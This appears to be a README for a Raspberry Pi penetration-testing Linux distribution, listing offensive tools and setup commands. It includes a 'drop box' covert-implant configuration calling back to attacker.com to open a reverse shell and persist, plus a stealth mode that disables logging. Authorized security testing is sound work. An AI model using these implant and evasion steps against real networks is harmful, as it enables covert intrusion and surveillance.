Security-focused Linux distribution optimized for Raspberry Pi
Portable penetration testing β’ IoT security β’ Embedded hacking β’ Field operations
Features β’ Download β’ Installation β’ Tools β’ Documentation
NullSec Linux Pi Edition is a specialized security distribution designed for Raspberry Pi hardware. It transforms your Pi into a powerful, portable penetration testing platform with optimized ARM tools, GPIO security utilities, and field-ready capabilities.
| Feature | Description |
|---|---|
| π§ ARM-Optimized Tools | 80+ security tools compiled for ARM64/ARMv7 |
| π‘ WiFi Attacks | Monitor mode drivers, aircrack-ng suite, WiFi Pineapple integration |
| π GPIO Security | Hardware hacking tools, JTAG/SWD debugging, signal analysis |
| π Stealth Mode | MAC spoofing, traffic obfuscation, covert channels |
| π± Mobile Integration | Android/iOS testing, Bluetooth attacks, NFC tools |
| π Power Optimized | Battery-friendly profiles, headless operation |
| π₯οΈ Multiple Modes | Desktop, headless server, kiosk, drop box |
| Device | Status | Notes |
|---|---|---|
| Raspberry Pi 5 | β Full Support | Recommended |
| Raspberry Pi 4B | β Full Support | 4GB+ RAM recommended |
| Raspberry Pi 400 | β Full Support | Built-in keyboard |
| Raspberry Pi 3B+ | Reduced toolset | |
| Raspberry Pi Zero 2W | Headless only |
Complete security toolkit with GUI, all tools, and development environment.
Headless operation with essential tools for field deployment.
Minimal footprint for covert network implants with auto-callback.
π Network Security (25+ tools)
- Nmap, Masscan, Netcat
- Aircrack-ng suite
- Bettercap, Responder
- Wireshark (GUI), tshark
- WiFite2, Wifiphisher
- Kismet, hostapd-wpe
π Exploitation (20+ tools)
- Metasploit Framework
- SQLMap, Commix
- Hydra, Medusa
- CrackMapExec
- Impacket suite
- Covenant (C2)
π Hardware Hacking (15+ tools)
- OpenOCD (JTAG/SWD)
- flashrom
- SigRok/PulseView
- can-utils (CAN bus)
- I2C/SPI tools
- GPIO manipulation
π» RF & Wireless (15+ tools)
- GNU Radio
- RTL-SDR tools
- HackRF utilities
- Bluetooth tools (Ubertooth)
- NFC tools (libnfc)
- LoRa analysis
# Download image
wget https://github.com/bad-antics/nullsec-linux-pi/releases/latest/download/nullsec-pi-full.img.xz
# Flash (Linux/macOS)
xzcat nullsec-pi-full.img.xz | sudo dd of=/dev/sdX bs=4M status=progress
# Or use Raspberry Pi Imager with custom image# Default credentials
Username: nullsec
Password: nullsec
# Change password immediately
passwd
# Update tools
sudo nullsec-update# Enable full stealth mode
sudo nullsec-stealth enable
# Includes:
# - MAC address randomization
# - Hostname spoofing
# - Traffic obfuscation
# - Logging disabled
# - Memory-only operation
# Disable stealth
sudo nullsec-stealth disableDeploy as a covert network implant:
# Configure callback
sudo nullsec-dropbox config \
--callback-host attacker.com \
--callback-port 443 \
--interval 300 \
--protocol https
# Enable drop box mode
sudo nullsec-dropbox enable
# Device will:
# - Auto-connect to any open WiFi
# - Establish reverse shell
# - Capture network traffic
# - Persist across reboots# JTAG scanning
sudo nullsec-jtag scan
# SWD debugging
sudo nullsec-swd connect --target stm32
# I2C enumeration
sudo nullsec-i2c scan
# SPI flash dump
sudo nullsec-spi dump --output firmware.bin| Edition | Storage | RAM | Network |
|---|---|---|---|
| Full | 16GB+ | 4GB+ | WiFi + Ethernet |
| Lite | 8GB+ | 2GB+ | WiFi |
| Drop Box | 4GB+ | 1GB+ | WiFi |
- NullSec Linux - Main distribution
- NullSec Flipper Suite - Flipper Zero tools
- NullSec Pineapple Suite - WiFi Pineapple payloads
bad-antics β’ For authorized security testing only